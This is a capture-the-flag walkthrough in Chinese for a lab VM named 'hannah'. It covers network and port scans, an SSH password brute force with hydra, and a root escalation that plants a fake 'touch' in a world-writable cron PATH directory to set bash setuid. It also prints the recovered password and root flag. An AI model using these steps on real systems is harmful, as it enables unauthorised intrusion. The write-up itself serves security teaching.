1.扫描网段

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[/home/ace]
└─# arp-scan -l --interface=eth1
Interface: eth1, type: EN10MB, MAC: 00:0c:29:4d:2f:15, IPv4: 192.168.56.127
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0a       (Unknown: locally administered)
192.168.56.100  08:00:27:28:10:c8       (Unknown)
192.168.56.134  08:00:27:7a:ae:cd       (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.850 seconds (138.38 hosts/sec). 3 responded

2.扫描端口服务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kali)-[/home/ace]
└─# nmap  -sC -sV 192.168.56.134 -p0-65535
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-28 14:03 CST
Nmap scan report for 192.168.56.134
Host is up (0.00080s latency).
Not shown: 65533 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
|_auth-owners: root
| ssh-hostkey: 
|   3072 5f1c78369905320982d3d5054c1475d1 (RSA)
|   256 0669ef979b34d7f3c79660d1a1ffd82c (ECDSA)
|_  256 853dda74b2684ea6f7e5f58540902e9a (ED25519)
80/tcp  open  http    nginx 1.18.0
| http-robots.txt: 1 disallowed entry 
|_/enlightenment
|_http-title: Site doesn't have a title (text/html).
|_auth-owners: moksha
|_http-server-header: nginx/1.18.0
113/tcp open  ident?
|_auth-owners: root
MAC Address: 08:00:27:7A:AE:CD (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.61 seconds

3.查看一下网页

image-20230728141534733

啥都没有???

4.扫描目录

dirsearch比较快,试一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿kali)-[/home/ace]
└─# dirsearch -u http://192.168.56.134/     

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                  
 (_||| _) (/_(_|| (_| )                                                                                                                           
                                                                                                                                                  
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.56.134/-_23-07-28_14-24-24.txt

Error Log: /root/.dirsearch/logs/errors-23-07-28_14-24-24.log

Target: http://192.168.56.134/

[14:24:24] Starting: 
[14:24:50] 200 -   19B  - /index.html                                       
[14:25:02] 200 -   25B  - /robots.txt                                       
                                                                             
Task Completed

5.访问一下robots.txt

image-20230728142843005

但是这里我们已经别无他法,hydra爆破准备

6.hydra爆破

上述结果已经说明用户为moksha

试一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(root㉿kali)-[/home/ace]
└─# hydra ssh://192.168.56.134 -l moksha -P /usr/share/wordlists/rockyou.txt -f -v
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-28 14:36:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.134:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://moksha@192.168.56.134:22
[INFO] Successful, password authentication is supported by ssh://192.168.56.134:22
[ERROR] could not connect to target port 22: Socket error: disconnected
[ERROR] ssh protocol error
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Disabled child 8 because of too many errors
[VERBOSE] Disabled child 15 because of too many errors
[ERROR] could not connect to target port 22: Socket error: Connection reset by peer
[ERROR] ssh protocol error
[VERBOSE] Disabled child 9 because of too many errors
[VERBOSE] Disabled child 14 because of too many errors
[22][ssh] host: 192.168.56.134   login: moksha   password: hannah
[STATUS] attack finished for 192.168.56.134 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-07-28 14:36:47

连接一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿kali)-[/home/ace]
└─# ssh moksha@192.168.56.134         
The authenticity of host '192.168.56.134 (192.168.56.134)' can't be established.
ED25519 key fingerprint is SHA256:RZdWDCayN2ZJO5rXaVv2OOemeArZ0UbcRoKCoz9lWzA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.134' (ED25519) to the list of known hosts.
Load key "/root/.ssh/id_rsa": error in libcrypto
moksha@192.168.56.134's password: 
Linux hannah 5.10.0-20-amd64 #1 SMP Debian 5.10.158-2 (2022-12-13) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jan  4 10:45:54 2023 from 192.168.1.51
moksha@hannah:~$

连接成功

获得usr.txt

7.sudo提权

1
2
moksha@hannah:~$ sudo l
-bash: sudo: orden no encontrada

查找二进制文件

1
2
3
4
5
6
7
8
9
10
11
moksha@hannah:~$ find / -type f -perm -4000 -ls 2>/dev/null
   137350     52 -rwsr-xr--   1 root     messagebus    51336 oct  5  2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   269176    472 -rwsr-xr-x   1 root     root         481608 jul  2  2022 /usr/lib/openssh/ssh-keysign
     3763     72 -rwsr-xr-x   1 root     root          71912 ene 20  2022 /usr/bin/su
     3604     44 -rwsr-xr-x   1 root     root          44632 feb  7  2020 /usr/bin/newgrp
      110     64 -rwsr-xr-x   1 root     root          63960 feb  7  2020 /usr/bin/passwd
     4132     36 -rwsr-xr-x   1 root     root          35040 ene 20  2022 /usr/bin/umount
      109     88 -rwsr-xr-x   1 root     root          88304 feb  7  2020 /usr/bin/gpasswd
      107     52 -rwsr-xr-x   1 root     root          52880 feb  7  2020 /usr/bin/chsh
      106     60 -rwsr-xr-x   1 root     root          58416 feb  7  2020 /usr/bin/chfn
     4130     56 -rwsr-xr-x   1 root     root          55528 ene 20  2022 /usr/bin/mount

没啥可以利用的

看看其他目录吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
moksha@hannah:/etc$ cat crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/media:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
* * * * * root touch /tmp/enlIghtenment
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

第19行有所提示,touch,那我们可以考虑一下路径劫持

1
2
3
moksha@hannah:/$ which touch
/usr/bin/touch
moksha@hannah:/$ 
1
2
3
4
5
6
7
8
moksha@hannah:/$ grep "PATH" /etc/crontab | tr -d "PATH=" | sed "s/:/\n/g" | xargs ls -ld
lrwxrwxrwx 1 root root     7 ene  4  2023 /bin -> usr/bin
drwxrwxrwx 3 root root  4096 ene  4  2023 /media
lrwxrwxrwx 1 root root     8 ene  4  2023 /sbin -> usr/sbin
drwxr-xr-x 2 root root 20480 ene  4  2023 /usr/bin
drwxr-xr-x 2 root root  4096 ene  4  2023 /usr/local/bin
drwxr-xr-x 2 root root  4096 ene  4  2023 /usr/local/sbin
drwxr-xr-x 2 root root 12288 ene  4  2023 /usr/sbin

media是目标

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
moksha@hannah:/$ echo "chmod +s /bin/bash" > /media/touch
moksha@hannah:/$ chmod +x /media/touch
moksha@hannah:/$ bash -p
moksha@hannah:/$ cd root
bash: cd: root: Permiso denegado
moksha@hannah:/$ bash -p
bash-5.1# ls
bin   dev  home        initrd.img.old  lib32  libx32      media  opt   root  sbin  sys  usr  vmlinuz
boot  etc  initrd.img  lib             lib64  lost+found  mnt    proc  run   srv   tmp  var  vmlinuz.old
bash-5.1# cd root 
bash-5.1# ls
root.txt
bash-5.1# cat root.txt
HMVHAPPYNY2023
bash-5.1#

over.